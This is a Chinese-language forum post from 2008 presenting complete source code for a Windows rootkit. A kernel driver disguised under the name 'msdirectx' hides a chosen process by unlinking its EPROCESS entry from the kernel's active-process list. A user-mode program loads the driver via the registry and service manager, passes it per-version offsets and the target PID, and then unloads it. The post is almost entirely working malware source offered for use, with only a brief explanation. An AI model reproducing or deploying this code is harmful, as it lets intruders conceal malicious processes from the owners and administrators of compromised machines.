直接修改内核对象隐藏进程

标 题: 【原创】直接修改内核对象隐藏进程
作 者: guolijie
时 间: 2008-05-12,10:13
链 接: http://bbs.pediy.com/showthread.php?t=64728

Windows NT/2000/XP/2003操作系统具有描述了进程的可执行对象。Taskmgr.exe列出机器上运行的进程。ZwQuerySystemInformation 也使用这 些 对象列出运行的进程,修改这 些 对象,可以隐藏进程。
      通过遍历 在每 个进程的EPROCESS结构中引用的一个双向链表,EPROCESS结构包含一个具有指针成员FLINK和BLINK的lLIST_ENTRY结构。这两个指针分别指向当前进程描述符的前方和后方进程,通过修改这 两个指针可以隐藏指定进程。
      本程序通过用户空间程序获的进程ID,EPROCESS块 中FLINK和 PID的偏移量 ,传送给驱动程序,驱动程序修改链表隐藏进程。而通过PsGetCurrentProcess可以得到当前进程的指针,顺藤摸瓜就可找到要隐藏的进程。以下是代码。

驱动程序
#include "ntddk.h"
#include "stdio.h"
#include "stdlib.h"
typedef BOOLEAN BOOL;
typedef unsigned long DWORD;
typedef DWORD * PDWORD;

#define FILE_DEVICE_ROOTKIT      0x00002a7b

#define IOCTL_ROOTKIT_INIT            (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x01, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define IOCTL_ROOTKIT_HIDEME          (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x02, METHOD_BUFFERED, FILE_WRITE_ACCESS)
int FLINKOFFSET;   
int PIDOFFSET; 
PDEVICE_OBJECT g_RootkitDevice; 
const WCHAR deviceLinkBuffer[]  = L"\\DosDevices\\msdirectx";
const WCHAR deviceNameBuffer[]  = L"\\Device\\msdirectx";
#define   DebugPrint    DbgPrint   
DWORD FindProcessEPROC(int);//遍历链表寻找要隐藏的进程的函数

NTSTATUS RootkitDispatch(IN PDEVICE_OBJECT, IN PIRP);
NTSTATUS RootkitUnload(IN PDRIVER_OBJECT);
NTSTATUS RootkitDeviceControl(IN PFILE_OBJECT, IN BOOLEAN, IN PVOID, 
              IN ULONG, OUT PVOID, IN ULONG, IN ULONG, 
              OUT PIO_STATUS_BLOCK, IN PDEVICE_OBJECT
              );

NTSTATUS DriverEntry(
           IN PDRIVER_OBJECT  DriverObject,
           IN PUNICODE_STRING RegistryPath
          )
{
  
    NTSTATUS                ntStatus;
    UNICODE_STRING          deviceNameUnicodeString;
    UNICODE_STRING          deviceLinkUnicodeString;        
    RtlInitUnicodeString (&deviceNameUnicodeString,
                          deviceNameBuffer );
    RtlInitUnicodeString (&deviceLinkUnicodeString,
                          deviceLinkBuffer );

    ntStatus = IoCreateDevice ( DriverObject,
                                0, // For driver extension
                                &deviceNameUnicodeString,
                                FILE_DEVICE_ROOTKIT,
                                0,
                                TRUE,
                                &g_RootkitDevice );

    if( NT_SUCCESS(ntStatus)) {
        ntStatus = IoCreateSymbolicLink (&deviceLinkUnicodeString,
                                         &deviceNameUnicodeString );

        DriverObject->MajorFunction[IRP_MJ_SHUTDOWN]        =
        DriverObject->MajorFunction[IRP_MJ_CREATE]          =
        DriverObject->MajorFunction[IRP_MJ_CLOSE]           =
        DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL]  = RootkitDispatch;

        DriverObject->DriverUnload                          = RootkitUnload;
    }
    else 
  {
        DebugPrint(("Failed to create device!\n"));
        return ntStatus;
    }

    return STATUS_SUCCESS;
}


NTSTATUS RootkitUnload(IN PDRIVER_OBJECT DriverObject)
{
    UNICODE_STRING          deviceLinkUnicodeString;
  PDEVICE_OBJECT      p_NextObj;

  p_NextObj = DriverObject->DeviceObject;

  if (p_NextObj != NULL)
  {
    RtlInitUnicodeString( &deviceLinkUnicodeString, deviceLinkBuffer );
    IoDeleteSymbolicLink( &deviceLinkUnicodeString );
    IoDeleteDevice( DriverObject->DeviceObject );
    return STATUS_SUCCESS;
  }
  return STATUS_SUCCESS;
}
NTSTATUS 
RootkitDispatch(
    IN PDEVICE_OBJECT DeviceObject, 
    IN PIRP Irp 
    )
{
    PIO_STACK_LOCATION      irpStack;
    PVOID                   inputBuffer;
    PVOID                   outputBuffer;
    ULONG                   inputBufferLength;
    ULONG                   outputBufferLength;
    ULONG                   ioControlCode;
  NTSTATUS        ntstatus;
  
    ntstatus = Irp->IoStatus.Status = STATUS_SUCCESS;
    Irp->IoStatus.Information = 0;
    irpStack = IoGetCurrentIrpStackLocation (Irp);
    
    inputBuffer             = Irp->AssociatedIrp.SystemBuffer;
    inputBufferLength       = irpStack->Parameters.DeviceIoControl.InputBufferLength;
    outputBuffer            = Irp->AssociatedIrp.SystemBuffer;
    outputBufferLength      = irpStack->Parameters.DeviceIoControl.OutputBufferLength;
    ioControlCode           = irpStack->Parameters.DeviceIoControl.IoControlCode;

    switch (irpStack->MajorFunction) {
    case IRP_MJ_CREATE:
        break;

    case IRP_MJ_SHUTDOWN:
        break;

    case IRP_MJ_CLOSE:
        break;

    case IRP_MJ_DEVICE_CONTROL:
        ntstatus = RootkitDeviceControl(  irpStack->FileObject, TRUE,
                        inputBuffer, inputBufferLength, 
                        outputBuffer, outputBufferLength,
                        ioControlCode, &Irp->IoStatus, DeviceObject );
        break;
    }
    IoCompleteRequest( Irp, IO_NO_INCREMENT );
    return ntstatus;   
}


NTSTATUS
RootkitDeviceControl(
    IN PFILE_OBJECT FileObject, 
    IN BOOLEAN Wait,
    IN PVOID InputBuffer, 
    IN ULONG InputBufferLength, 
    OUT PVOID OutputBuffer, 
    IN ULONG OutputBufferLength, 
    IN ULONG IoControlCode, 
    OUT PIO_STATUS_BLOCK IoStatus, 
    IN PDEVICE_OBJECT DeviceObject 
    ) 
{
  NTSTATUS ntStatus;
    UNICODE_STRING          deviceLinkUnicodeString;

  int  find_PID = 0;

  DWORD eproc      = 0x00000000;
  DWORD start_eproc= 0x00000000;
  PLIST_ENTRY          plist_active_procs = NULL;

  IoStatus->Status = STATUS_SUCCESS;
    IoStatus->Information = 0;

    switch ( IoControlCode ) 
  {

  case IOCTL_ROOTKIT_INIT:
    if ((InputBufferLength < sizeof(int) * 8) || (InputBuffer == NULL))
    {
      IoStatus->Status = STATUS_INVALID_BUFFER_SIZE;
      break;
    }
    PIDOFFSET       = (int) (*(int *)InputBuffer);//从用户空间得到PID和FLINKOFFSET
    FLINKOFFSET     = (int) (*((int *)InputBuffer+1));
  
  break;

  case IOCTL_ROOTKIT_HIDEME:
    if ((InputBufferLength < sizeof(DWORD)) || (InputBuffer == NULL))
    {
      IoStatus->Status = STATUS_INVALID_BUFFER_SIZE;
      break;
    }

    find_PID = *((DWORD *)InputBuffer);//从用户空间程序得到隐藏进程ID号
    if (find_PID == 0x00000000)
    {
      IoStatus->Status = STATUS_INVALID_PARAMETER;
      break;
    }
    
    eproc = FindProcessEPROC(find_PID);//通过ID号找到对应进程
    if (eproc == 0x00000000)
    {
      IoStatus->Status = STATUS_INVALID_PARAMETER;
      break;
    }
    
    plist_active_procs = (LIST_ENTRY *) (eproc+FLINKOFFSET);//隐藏进程
    *((DWORD *)plist_active_procs->Blink) = (DWORD) plist_active_procs->Flink;
    *((DWORD *)plist_active_procs->Flink+1) = (DWORD) plist_active_procs->Blink;
  
    break;
   
  default:
    IoStatus->Status = STATUS_INVALID_DEVICE_REQUEST;
    break;
  }

    return IoStatus->Status;
}
DWORD FindProcessEPROC (int terminate_PID)
{
  DWORD eproc       = 0x00000000; 
  int   current_PID = 0;
  int   start_PID   = 0; 
  int   i_count     = 0;
  PLIST_ENTRY plist_active_procs;

  
  if (terminate_PID == 0)
    return terminate_PID;

  eproc = (DWORD) PsGetCurrentProcess();//得到当前进程的PLIST_ENTRY
  start_PID = *((DWORD*)(eproc+PIDOFFSET));//PIDOFFSET为PLIST_ENTRY中保存进程ID的偏移量。
  current_PID = start_PID;

  while(1)//遍历链表比较进程ID找到要隐藏的进程的PLIST_ENTRY
  {
    if(terminate_PID == current_PID)
      return eproc;
    else if((i_count >= 1) && (start_PID == current_PID))
    {
      return 0x00000000;
    }
    else {
      plist_active_procs = (LIST_ENTRY *) (eproc+FLINKOFFSET);
      eproc = (DWORD) plist_active_procs->Flink;
      eproc = eproc - FLINKOFFSET;
      current_PID = *((int *)(eproc+PIDOFFSET));
      i_count++;
    }
  }
}


2 用户空间程序
#include "stdafx.h"
#include <windows.h>
#include <stdio.h>
#include <process.h>
#include <tlhelp32.h>
#include <string.h>
#include <winioctl.h>
#include <winsvc.h>
#include <tchar.h>
#include <stdlib.h>
#define        SECURITY_STRING_LEN              168
#define        LG_PAGE_SIZE                4096
#define        MAX_KEY_LENGTH                1024
#define        LG_SLEEP_TIME                4000

#define FILE_DEVICE_ROOTKIT      0x00002a7b
#define IOCTL_ROOTKIT_HIDEME          (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x02, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define IOCTL_ROOTKIT_INIT            (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x01, METHOD_BUFFERED, FILE_WRITE_ACCESS)
HANDLE gh_Device = INVALID_HANDLE_VALUE;
static CHAR ac_driverLabel[]="msdirectx";
static CHAR ac_driverName[]="msdirectx.sys";
DWORD pid;
HANDLE h_Device = INVALID_HANDLE_VALUE;
DWORD  d_bytesRead, d_error;
CHAR ac_driverPath[MAX_PATH];
BOOL bOsVersionInfoEx;
BOOL Found = FALSE;
CHAR acModulePath[MAX_PATH];
int  pid_offset = 0;
int  flink_offset = 0;
int  authid_offset = 0;
int  token_offset = 0; 
int  privcount_offset = 0;
int  privaddr_offset  = 0;
int  sidcount_offset = 0;
int  sidaddr_offset  = 0;
char m_szDriverExt[MAX_PATH];
char DriverName[MAX_PATH];
char sz_drivername[MAX_PATH];
char m_szDriverFullPath[MAX_PATH];
PROCESSENTRY32 stProcess;

const BYTE g_szSecurity[SECURITY_STRING_LEN]=
{
  0x01,0x00,0x14,0x80,0x90,0x00,0x00,0x00,0x9c,0x00,0x00,0x00,0x14,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x02,
  0x00,0x1c,0x00,0x01,0x00,0x00,0x00,0x02,0x80,0x14,0x00,0xff,0x01,0x0f,0x00,0x01,0x01,0x00,0x00,0x00,0x00,
  0x00,0x01,0x00,0x00,0x00,0x00,0x02,0x00,0x60,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x14,0x00,0xfd,0x01,0x02,
  0x00,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x05,0x12,0x00,0x00,0x00,0x00,0x00,0x18,0x00,0xff,0x01,0x0f,0x00,
  0x01,0x02,0x00,0x00,0x00,0x00,0x00,0x05,0x20,0x00,0x00,0x00,0x20,0x02,0x00,0x00,0x00,0x00,0x14,0x00,0x8d,
  0x01,0x02,0x00,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x05,0x0b,0x00,0x00,0x00,0x00,0x00,0x18,0x00,0xfd,0x01,
  0x02,0x00,0x01,0x02,0x00,0x00,0x00,0x00,0x00,0x05,0x20,0x00,0x00,0x00,0x23,0x02,0x00,0x00,0x01,0x01,0x00,
  0x00,0x00,0x00,0x00,0x05,0x12,0x00,0x00,0x00,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x05,0x12,0x00,0x00,0x00
};


/*******************************************************************************\
*
*  函数及实现
*
\*******************************************************************************/

void PrintLastError(int errorno)
{
#if defined(DEBUG) || defined(_DEBUG)
  LPVOID  lpMsgBuf;

  if(0==errorno)
  {
    errorno=GetLastError();
  }
  FormatMessage( FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS,NULL,errorno,0,(LPTSTR) &lpMsgBuf,0,NULL);
#ifdef _CONSOLE
  printf("%s\r\n",lpMsgBuf);
#else
  MessageBox(NULL,(LPCTSTR)lpMsgBuf,"错误",MB_OK|MB_TOPMOST);
#endif
  LocalFree(lpMsgBuf);

#endif
}

bool SplitFilePath(const char* szFullPath,char* szPath,char* szFileName,char* szFileExt)
{
  char*  p,*q,*r;
  size_t  len;

  if(NULL==szFullPath)
  {
    return false;
  }
  p=(char*)szFullPath;
  len=strlen(szFullPath);
  if(szPath)
  {
    szPath[0]=0;
  }
  if(szFileName)
  {
    szFileName[0]=0;
  }
  if(szFileExt)
  {
    szFileExt[0]=0;
  }
  q=p+len;
  while(q>p)
  {
    if( *q=='\\' || *q=='/')
    {
      break;
    }
    q--;
  }
  if(q<=p)
  {
    return false;
  }
  if(szPath)
  {
    memcpy(szPath,p,q-p+1);
    szPath[q-p+1]=0;
  }
  q++;
  p=q;
  r=NULL;
  while(*q)
  {
    if(*q=='.')
    {
      r=q;
    }
    q++;
  }
  if(NULL==r)
  {
    if(szFileName)
    {
      memcpy(szFileName,p,q-p+1);
    }
  }
  else
  {
    if(szFileName)
    {
      memcpy(szFileName,p,r-p);
      szFileName[r-p]=0;
    }
    if(szFileExt)
    {
      memcpy(szFileExt,r+1,q-r+1);
    }
  }

  return true;
}
int  InstallDriver(const char* cszDriverName,const char* cszDriverFullPath)
{
  char  szBuf[LG_PAGE_SIZE];
  HKEY  hKey;
  DWORD  dwData;

  if( NULL==cszDriverName || NULL==cszDriverFullPath )
  {
    return -1;
  }
  memset(szBuf,0,LG_PAGE_SIZE);
  strcpy(szBuf,"SYSTEM\\CurrentControlSet\\Services\\");
  strcat(szBuf,cszDriverName);
  if(RegCreateKeyEx(HKEY_LOCAL_MACHINE,szBuf,0,"",0,KEY_ALL_ACCESS,NULL,&hKey,(LPDWORD)&dwData)!=ERROR_SUCCESS)
  {
    return -1;
  }
  strcpy(szBuf,cszDriverName);
  if(RegSetValueEx(hKey,"DisplayName",0,REG_SZ,(CONST BYTE*)szBuf,(DWORD)strlen(szBuf))!=ERROR_SUCCESS)
  {
    return -1;
  }
  dwData=1;
  if(RegSetValueEx(hKey,"ErrorControl",0,REG_DWORD,(CONST BYTE*)&dwData,sizeof(DWORD))!=ERROR_SUCCESS)
  {
    return -1;
  }
  strcpy(szBuf,"\\??\\");
  strcat(szBuf,cszDriverFullPath);
  if(RegSetValueEx(hKey,"ImagePath",0,REG_SZ,(CONST BYTE*)szBuf,(DWORD)strlen(szBuf))!=ERROR_SUCCESS)
  {
    return -1;
  }
  dwData=3;
  if(RegSetValueEx(hKey,"Start",0,REG_DWORD,(CONST BYTE*)&dwData,sizeof(DWORD))!=ERROR_SUCCESS)
  {
    return -1;
  }
  dwData=1;
  if(RegSetValueEx(hKey,"Type",0,REG_DWORD,(CONST BYTE*)&dwData,sizeof(DWORD))!=ERROR_SUCCESS)
  {
    return -1;
  }
  RegFlushKey(hKey);
  RegCloseKey(hKey);
  strcpy(szBuf,"SYSTEM\\CurrentControlSet\\Services\\");
  strcat(szBuf,cszDriverName);
  strcat(szBuf,"\\Security");
  if(RegCreateKeyEx(HKEY_LOCAL_MACHINE,szBuf,0,"",0,KEY_ALL_ACCESS,NULL,&hKey,(LPDWORD)&dwData)!=ERROR_SUCCESS)
  {
    return -1;
  }
  dwData=SECURITY_STRING_LEN;
  if(RegSetValueEx(hKey,"Security",0,REG_BINARY,g_szSecurity,dwData)!=ERROR_SUCCESS)
  {
    return -1;
  }
  RegFlushKey(hKey);
  RegCloseKey(hKey);

  return 0;
}

int CreateDriver(const char* cszDriverName,const char* cszDriverFullPath)
{
  SC_HANDLE    schManager;
  SC_HANDLE    schService;
  SERVICE_STATUS  svcStatus;
  bool      bStopped=false;
  int        i;

  if( NULL==cszDriverName || NULL==cszDriverFullPath )
  {
    return -1;
  }
  schManager=OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
  if(NULL==schManager)
  {
    return -1;
  }
  schService=OpenService(schManager,cszDriverName,SERVICE_ALL_ACCESS);
  if(NULL!=schService)
  {
    if(ControlService(schService,SERVICE_CONTROL_INTERROGATE,&svcStatus))
    {
      if(svcStatus.dwCurrentState!=SERVICE_STOPPED)
      {
        if(0==ControlService(schService,SERVICE_CONTROL_STOP,&svcStatus))
        {
          CloseServiceHandle(schService);
          CloseServiceHandle(schManager);
          return -1;
        }
        for(i=0;i<10;i++)
        {
          if( ControlService(schService,SERVICE_CONTROL_INTERROGATE,&svcStatus)==0 || svcStatus.dwCurrentState==SERVICE_STOPPED )
          {
            bStopped=true;
            break;
          }
          Sleep(LG_SLEEP_TIME);
        }
        if(!bStopped)
        {
          CloseServiceHandle(schService);
          CloseServiceHandle(schManager);
          return -1;
        }
      }
    }
    CloseServiceHandle(schService);
    CloseServiceHandle(schManager);
    return 0;
  }
  schService=CreateService(schManager,cszDriverName,cszDriverName,SERVICE_ALL_ACCESS,SERVICE_KERNEL_DRIVER,SERVICE_SYSTEM_START,SERVICE_ERROR_NORMAL,cszDriverFullPath,NULL,NULL,NULL,NULL,NULL);
  if(NULL==schService)
  {
    CloseServiceHandle(schManager);
    return -1;
  }
  CloseServiceHandle(schService);
  CloseServiceHandle(schManager);

  return 0;
}

int StartDriver(const char* cszDriverName,const char* cszDriverFullPath)
{
  SC_HANDLE    schManager;
  SC_HANDLE    schService;
  SERVICE_STATUS  svcStatus;
  bool      bStarted=false;
  int        i;

  if(NULL==cszDriverName)
  {
    return -1;
  }
  if(CreateDriver(cszDriverName,cszDriverFullPath)<0)
  {
    return -1;
  }
  schManager=OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
  if(NULL==schManager)
  {
    return -1;
  }
  schService=OpenService(schManager,cszDriverName,SERVICE_ALL_ACCESS);
  if(NULL==schService)
  {
    CloseServiceHandle(schManager);
    return -1;
  }
  if(ControlService(schService,SERVICE_CONTROL_INTERROGATE,&svcStatus))
  {
    if(svcStatus.dwCurrentState==SERVICE_RUNNING)
    {
      CloseServiceHandle(schService);
      CloseServiceHandle(schManager);
      return 0;
    }
  }
  else if(GetLastError()!=ERROR_SERVICE_NOT_ACTIVE)
  {
    CloseServiceHandle(schService);
    CloseServiceHandle(schManager);
    return -1;
  }
  if(0==StartService(schService,0,NULL))
  {
    CloseServiceHandle(schService);
    CloseServiceHandle(schManager);
    PrintLastError(0);
    return -1;
  }
  for(i=0;i<10;i++)
  {
    if( ControlService(schService,SERVICE_CONTROL_INTERROGATE,&svcStatus) && svcStatus.dwCurrentState==SERVICE_RUNNING )
    {
      bStarted=true;
      break;
    }
    Sleep(LG_SLEEP_TIME);
  }
  CloseServiceHandle(schService);
  CloseServiceHandle(schManager);

  return bStarted?0:-1;
}

int StopDriver(const char* cszDriverName,const char* cszDriverFullPath)
{
  SC_HANDLE    schManager;
  SC_HANDLE    schService;
  SERVICE_STATUS  svcStatus;
  bool      bStopped=false;
  int        i;

  schManager=OpenSCManager(NULL,0,0);
  if(NULL==schManager)
  {
    return -1;
  }
  schService=OpenService(schManager,cszDriverName,SERVICE_ALL_ACCESS);
  if(NULL==schService)
  {
    CloseServiceHandle(schManager);
    return -1;
  }
  if(ControlService(schService,SERVICE_CONTROL_INTERROGATE,&svcStatus))
  {
    if(svcStatus.dwCurrentState!=SERVICE_STOPPED)
    {
      if(0==ControlService(schService,SERVICE_CONTROL_STOP,&svcStatus))
      {
        CloseServiceHandle(schService);
        CloseServiceHandle(schManager);
        return -1;
      }
      for(i=0;i<10;i++)
      {
        if( ControlService(schService,SERVICE_CONTROL_INTERROGATE,&svcStatus)==0 || svcStatus.dwCurrentState==SERVICE_STOPPED )
        {
          bStopped=true;
          break;
        }
        Sleep(LG_SLEEP_TIME);
      }
      if(!bStopped)
      {
        CloseServiceHandle(schService);
        CloseServiceHandle(schManager);
        return -1;
      }
    }
  }
  CloseServiceHandle(schService);
  CloseServiceHandle(schManager);

  return 0;
}

int DeleteDriver(const char* cszDriverName,const char* cszDriverFullPath)
{
  SC_HANDLE    schManager;
  SC_HANDLE    schService;
  SERVICE_STATUS  svcStatus;

  schManager=OpenSCManager(NULL,0,0);
  if(NULL==schManager)
  {
    return -1;
  }
  schService=OpenService(schManager,cszDriverName,SERVICE_ALL_ACCESS);
  if(NULL==schService)
  {
    CloseServiceHandle(schManager);
    return -1;
  }
  ControlService(schService,SERVICE_CONTROL_STOP,&svcStatus);
  if(0==DeleteService(schService))
  {
    CloseServiceHandle(schService);
    CloseServiceHandle(schManager);
    return -1;
  }
  CloseServiceHandle(schService);
  CloseServiceHandle(schManager);

  return 0;
}

LONG RegDeleteKeyNT(HKEY hStartKey,LPTSTR pKeyName)
{
  DWORD  dwSubKeyLength;
  LPTSTR  pSubKey=NULL;
  TCHAR  szSubKey[MAX_KEY_LENGTH];
  HKEY  hKey;
  LONG  lRet;

  if( pKeyName && lstrlen(pKeyName) )
  {
    if((lRet=RegOpenKeyEx(hStartKey,pKeyName,0,KEY_ENUMERATE_SUB_KEYS|DELETE,&hKey))==ERROR_SUCCESS)
    {
      while(lRet==ERROR_SUCCESS)
      {
        dwSubKeyLength=MAX_KEY_LENGTH;
        lRet=RegEnumKeyEx(hKey,0,szSubKey,(LPDWORD)&dwSubKeyLength,NULL,NULL,NULL,NULL);
        if(lRet==ERROR_NO_MORE_ITEMS)
        {
          lRet=RegDeleteKey(hStartKey,pKeyName);
          break;
        }
        else if(lRet==ERROR_SUCCESS)
        {
          lRet=RegDeleteKeyNT(hKey,szSubKey);
        }
      }
      RegCloseKey(hKey);
    }
  }
  else
  {
    lRet=ERROR_BADKEY;
  }

  return lRet;
}

int RemoveDriver(const char* cszDriverName,const char* cszDriverFullPath)
{
  HKEY hKey;
  long errorno;
  char szBuf[LG_PAGE_SIZE];
  char szDriverName[MAX_PATH];

  memset(szBuf,0,LG_PAGE_SIZE);
  memset(szDriverName,0,MAX_PATH);
  strcpy(szDriverName,cszDriverName);
  strcpy(szBuf,"SYSTEM\\CurrentControlSet\\Services\\");
  if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,szBuf,0,KEY_ALL_ACCESS,&hKey)!=ERROR_SUCCESS)
  {
    return -1;
  }
  if((errorno=RegDeleteKeyNT(hKey,szDriverName))!=ERROR_SUCCESS)
  {
    return -1;
  }
  RegCloseKey(hKey);

  return 0;
}

DWORD HideProc(const char *ProcessName)
{
  DWORD d_bytesRead;
  DWORD success=-1;
    OSVERSIONINFOEX osvi;
  HANDLE hSnapShot;
  BOOL status;
    int  *os_offsets;
  ZeroMemory(&osvi,sizeof(OSVERSIONINFOEX));
  osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);//不同版本的Windows有不同的 PID和FLINK偏移量
  if( !(bOsVersionInfoEx = GetVersionEx ((OSVERSIONINFO *) &osvi)) )
  {
      osvi.dwOSVersionInfoSize = sizeof (OSVERSIONINFO);
      if (! GetVersionEx ( (OSVERSIONINFO *) &osvi) ) 
      return -1;
  }

  switch (osvi.dwPlatformId)
  {
      case VER_PLATFORM_WIN32_NT:
        if ( osvi.dwMajorVersion == 4 && osvi.dwMinorVersion == 0)
        {
          pid_offset = 148;//就用了这pid_offset和flink_offset这两个变量,别的没用,
          flink_offset = 152;
          authid_offset = 24;
          token_offset = 264; 
          privcount_offset = 52;
          privaddr_offset  = 80;
          sidcount_offset = 48;
          sidaddr_offset  = 72;

          Found = TRUE;
        }
        else if ( osvi.dwMajorVersion == 5 && \
                osvi.dwMinorVersion == 0 )
        {
          pid_offset = 156;
          flink_offset = 160;
          authid_offset = 0x18;
          token_offset = 0x12c; 
          privcount_offset = 0x44;
          privaddr_offset  = 0x64;
          sidcount_offset = 0x3c;
          sidaddr_offset  = 0x58;

          Found = TRUE;
        }
        else if ( osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 1 )
        {
          pid_offset = 132;
          flink_offset = 136;
          authid_offset = 24;
          token_offset = 200; 
          privcount_offset = 72;
          privaddr_offset  = 104;
          sidcount_offset = 64;
          sidaddr_offset  = 92;

          Found = TRUE;
        }
        else if ( osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2 )
        {
          pid_offset = 132;
          flink_offset = 136;
          authid_offset = 24;
          token_offset = 200; 
          privcount_offset = 84;
          privaddr_offset  = 116;
          sidcount_offset = 76;
          sidaddr_offset  = 104;

          Found = TRUE;
        }
         break;

    default:
      fprintf(stderr, "\nOperating System Version %d.%d Not Supported!\n", osvi.dwMajorVersion, osvi.dwMinorVersion); 
      return -1;
      break; 
  }
  if (!Found)
  {
    return -1;
  }
    os_offsets = (int *)calloc(1, sizeof(int)*8);
  if (!os_offsets)
  {
      //fprintf(stderr, "Memory allocation failed.\n");
      return -1;
  }
  memcpy(os_offsets, &pid_offset, sizeof(int));
  memcpy(os_offsets + 1, &flink_offset, sizeof(int));
  memcpy(os_offsets + 2, &authid_offset, sizeof(int));
  memcpy(os_offsets + 3, &token_offset, sizeof(int));
  memcpy(os_offsets + 4, &privcount_offset, sizeof(int));
  memcpy(os_offsets + 5, &privaddr_offset, sizeof(int));
  memcpy(os_offsets + 6, &sidcount_offset, sizeof(int));
  memcpy(os_offsets + 7, &sidaddr_offset, sizeof(int));



  stProcess.dwSize=sizeof(stProcess);
  hSnapShot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
  status=Process32First(hSnapShot,&stProcess);//用快照函数获取进程ID
  while(status)
  {
    if(!strcmp(ProcessName,stProcess.szExeFile))
    {
        printf("the ProcessName is %s,ID is %d\n",stProcess.szExeFile,stProcess.th32ProcessID);
      pid=stProcess.th32ProcessID;
    }
    status=Process32Next(hSnapShot,&stProcess);
  }

    h_Device=CreateFile("\\\\.\\msdirectx",GENERIC_READ+GENERIC_WRITE,0,NULL,OPEN_EXISTING,0,NULL);//!=INVALID_HANDLE_VALUE)
  
  if(h_Device!=INVALID_HANDLE_VALUE)
  {
       if(!DeviceIoControl(h_Device, IOCTL_ROOTKIT_INIT,
              os_offsets,
              sizeof(int)*8,
              NULL,
              0,
              &d_bytesRead,
              NULL))
       return -1;
         success = DeviceIoControl(h_Device, 
          IOCTL_ROOTKIT_HIDEME,
          (void *) &pid,
          sizeof(DWORD),
          NULL,
          0,
          &d_bytesRead,
          NULL);
  }
  else
  {
    printf("can not open device\n");
    return success;
  }
  CloseHandle(h_Device);
  return success;  
}

BOOL DeleteDeviceDriver()//char *DriverName)
{
  if(0>StopDriver(DriverName,m_szDriverFullPath))
  {
    printf("StopDriver failed\n");
    return FALSE;
  }
  else if(0>RemoveDriver(DriverName,m_szDriverFullPath))
  {
    printf("Remove Driver failed\n");
    return FALSE;
  }
  return TRUE;
}
BOOL LoadDeviceDriver()//char *DriverName)
{

  if (GetCurrentDirectory(MAX_PATH, m_szDriverFullPath))
  {
    strncat(m_szDriverFullPath,"\\",MAX_PATH-strlen(m_szDriverFullPath));
    strncat(m_szDriverFullPath,"msdirectx.sys",MAX_PATH-strlen(m_szDriverFullPath));
    SplitFilePath(m_szDriverFullPath,ac_driverPath,DriverName,m_szDriverExt);
    if(0>InstallDriver(DriverName,m_szDriverFullPath))
    {
      printf("install failed \n");
      return FALSE;
    }
    else if(0>StartDriver(DriverName,m_szDriverFullPath))
    {
      printf("Start failed\n");
      return FALSE;
    }
  }

  return TRUE;
}
int main()
{
  const int PROCNAMELEN=26;
  
  char *buffer,*start,*ProcessName=new char[MAX_PATH];
  printf("输入隐藏进程名\n");
  
  scanf("%s",ProcessName);
     if(!LoadDeviceDriver())//sz_drivername))//启动驱动程序
     return 0;
  HideProc(ProcessName);//隐藏进程
  if(!(DeleteDeviceDriver()))//sz_drivername)))
    return 0;
//  printf("Hello World!\n");
  return 0;
}
/*
void main()
{
}*/

你可能感兴趣的:(直接修改内核对象隐藏进程)